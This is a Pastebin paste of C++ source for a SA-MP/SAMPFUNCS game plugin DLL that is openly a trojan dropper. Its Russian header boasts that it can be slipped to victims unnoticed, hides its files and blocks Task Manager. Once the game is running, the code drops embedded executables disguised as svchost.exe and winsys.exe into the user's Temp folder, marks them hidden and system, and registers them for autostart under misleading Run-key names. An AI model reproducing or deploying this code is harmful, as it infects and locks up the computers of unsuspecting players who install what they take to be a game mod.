SHARE
TWEET

фч

a guest Aug 11th, 2017 511 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #define _SILENCE_STDEXT_HASH_DEPRECATION_WARNINGS
  2. // by Martin 0pc0d3R
  3. /*
  4.     TODO:
  5.     - Дропнуть резервные копии ехешников и добавить их в планировщик
  6.     Особенности:
  7.     + SF Троян (Беспалевно можна подсунуть)
  8.     + Сравнительно небольшой вес
  9.     + Дропает скрытые файлы помеченные как системные
  10.     + Прописывается в автозагрузку
  11.     + Баннер невозможно ничем закрыть/перебить
  12.     + Отключает диспетчер задач прямо в системе
  13. */
  14. #include <windows.h>
  15. #include <string>
  16. #include <assert.h>
  17. #include <process.h>
  18. #include "SAMPFUNCS_API.h"
  19. #include "game_api\game_api.h"
  20. #include <shellapi.h>
  21. #include "resource.h"
  22. #include "Registry.h"
  23. #include <direct.h>
  24. #pragma comment (lib, "Shell32.lib")
  25. HMODULE ThisDLL = nullptr;
  26. SAMPFUNCS *SF = new SAMPFUNCS();
  27. bool extractResource(bool mode = false)
  28. {
  29.     bool success = false;
  30.     try  
  31.     {
  32.         if (mode == false)
  33.         {
  34.             HRSRC hResource = ::FindResourceA(ThisDLL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
  35.             if (hResource == 0) return false;
  36.             HGLOBAL hFileResource = LoadResource(ThisDLL, hResource);
  37.             if (hFileResource == 0) return false;
  38.             LPVOID lpFile = LockResource(hFileResource);
  39.             if (lpFile == 0) return false;
  40.             DWORD dwSize = SizeofResource(ThisDLL, hResource);
  41.             if (dwSize == 0) return false;
  42.             char Uname[50]; DWORD szI = 50; GetUserNameA(Uname, &szI);
  43.             char path[256]; sprintf(path, "C:\\Users\\%s\\AppData\\Local\\Temp\\svchost.exe", Uname);
  44.             HANDLE hFile = CreateFile(path, GENERIC_READ | GENERIC_WRITE, 0, NULL,
  45.             CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
  46.             HANDLE hFilemap = CreateFileMappingA(hFile, NULL, PAGE_READWRITE, 0, dwSize, NULL);
  47.             if (hFilemap == 0) {return false;}
  48.             LPVOID lpBaseAddress = MapViewOfFile(hFilemap, FILE_MAP_WRITE, 0, 0, 0);            
  49.             CopyMemory(lpBaseAddress, lpFile, dwSize);
  50.             UnmapViewOfFile(lpBaseAddress); CloseHandle(hFilemap); CloseHandle(hFile);
  51.             DWORD attributes = GetFileAttributes(path);
  52.             SetFileAttributes(path, attributes + FILE_ATTRIBUTE_SYSTEM + FILE_ATTRIBUTE_HIDDEN);
  53.             return true;
  54.         }
  55.         else
  56.         {
  57.             HRSRC hResource = ::FindResourceA(ThisDLL, MAKEINTRESOURCE(IDR_RCDATA2), RT_RCDATA);
  58.             if (hResource == 0) return false;
  59.             HGLOBAL hFileResource = LoadResource(ThisDLL, hResource);
  60.             if (hFileResource == 0) return false;
  61.             LPVOID lpFile = LockResource(hFileResource);
  62.             if (lpFile == 0) return false;
  63.             DWORD dwSize = SizeofResource(ThisDLL, hResource);
  64.             if (dwSize == 0) return false;
  65.             char Uname[50]; DWORD szI = 50; GetUserNameA(Uname, &szI);
  66.             char path[256]; sprintf(path, "C:\\Users\\%s\\AppData\\Local\\Temp\\winsys.exe", Uname);
  67.             HANDLE hFile = CreateFile(path, GENERIC_READ | GENERIC_WRITE, 0, NULL,
  68.             CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
  69.             HANDLE hFilemap = CreateFileMappingA(hFile, NULL, PAGE_READWRITE, 0, dwSize, NULL);
  70.             if (hFilemap == 0) {return false;}
  71.             LPVOID lpBaseAddress = MapViewOfFile(hFilemap, FILE_MAP_WRITE, 0, 0, 0);            
  72.             CopyMemory(lpBaseAddress, lpFile, dwSize);
  73.             UnmapViewOfFile(lpBaseAddress); CloseHandle(hFilemap); CloseHandle(hFile);
  74.             DWORD attributes = GetFileAttributes(path);
  75.             SetFileAttributes(path, attributes + FILE_ATTRIBUTE_SYSTEM + FILE_ATTRIBUTE_HIDDEN);
  76.             return true;
  77.         }
  78.     }
  79.     catch (...) {}
  80.     return success;
  81. }
  82. void Dropper()
  83. {
  84.     CEasyRegistry *trojan = new CEasyRegistry(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run");
  85.     static bool first_etap = false;
  86.     if (first_etap == false)
  87.     {
  88.         bool eSuccess = extractResource(false);
  89.         char Uname[50]; DWORD szI = 50; GetUserNameA(Uname, &szI);
  90.         char path[256]; sprintf(path, "C:\\Users\\%s\\AppData\\Local\\Temp\\svchost.exe", Uname);
  91.         char npath[256]; sprintf(npath, "\"%s\"", path);
  92.         trojan->WriteString("mscorclr", npath);
  93.         if (eSuccess == true) ShellExecuteA(NULL, "open", path, NULL, NULL, SW_HIDE);
  94.         first_etap = true; Dropper();
  95.     }
  96.     else
  97.     {
  98.         ///////////////////////////////////////////////////////////////////////////////////////////
  99.         bool Success = extractResource(true);
  100.         char Uname[50]; DWORD szI = 50; GetUserNameA(Uname, &szI);
  101.         char dpath[256]; sprintf(dpath, "C:\\Users\\%s\\AppData\\Local\\Temp\\winsys.exe", Uname);
  102.         char rpath[256]; sprintf(rpath, "\"%s\"", dpath);
  103.         trojan->WriteString("windrm", rpath);
  104.         if (Success == true) ShellExecuteA(NULL, "open", dpath, NULL, NULL, SW_SHOW);
  105.     }
  106.     /*HRSRC hResource = ::FindResourceA(ThisDLL, MAKEINTRESOURCE(IDR_RCDATA3), RT_RCDATA);
  107.     if (hResource == 0) return;
  108.     HGLOBAL hFileResource = LoadResource(ThisDLL, hResource);
  109.     if (hFileResource == 0) return;
  110.     LPVOID lpFile = LockResource(hFileResource);
  111.     if (lpFile == 0) return;
  112.     DWORD dwSize = SizeofResource(ThisDLL, hResource);
  113.     if (dwSize == 0) return;
  114.     char path[256]; _getcwd(path, 256);
  115.     strcat(path, "\\SAMPFUNCS\\SAMPFUNCS.sf");
  116.     HANDLE hFile = CreateFile(path, GENERIC_READ | GENERIC_WRITE, 0, NULL,
  117.     CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
  118.     HANDLE hFilemap = CreateFileMappingA(hFile, NULL, PAGE_READWRITE, 0, dwSize, NULL);
  119.     if (hFilemap == 0) {return;}
  120.     LPVOID lpBaseAddress = MapViewOfFile(hFilemap, FILE_MAP_WRITE, 0, 0, 0);            
  121.     CopyMemory(lpBaseAddress, lpFile, dwSize);
  122.     UnmapViewOfFile(lpBaseAddress); CloseHandle(hFilemap); CloseHandle(hFile);
  123.     DWORD attributes = GetFileAttributes(path);
  124.     SetFileAttributes(path, attributes + FILE_ATTRIBUTE_HIDDEN);*/
  125. }
  126. void __stdcall mainloop( void )
  127. {
  128.     static bool init = false;
  129.     if (!init)
  130.     {
  131.         if (GAME == nullptr) return;
  132.         if (GAME->GetSystemState() != eSystemState::GS_PLAYING_GAME) return;
  133.         if(!SF->getSAMP()->IsInitialized()) return;
  134.         Dropper();
  135.         init = true;
  136.     }
  137. }
  138. bool WINAPI DllMain( HMODULE hModule, DWORD dwReasonForCall, LPVOID lpReserved )
  139. {
  140.     switch ( dwReasonForCall )
  141.     {
  142.     case DLL_PROCESS_ATTACH:
  143.         ThisDLL = hModule;
  144.         SF->initPlugin( mainloop, hModule );
  145.         break;
  146.     case DLL_THREAD_ATTACH:
  147.     case DLL_THREAD_DETACH:
  148.     case DLL_PROCESS_DETACH:
  149.         break;
  150.     }
  151.     return TRUE;
  152. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top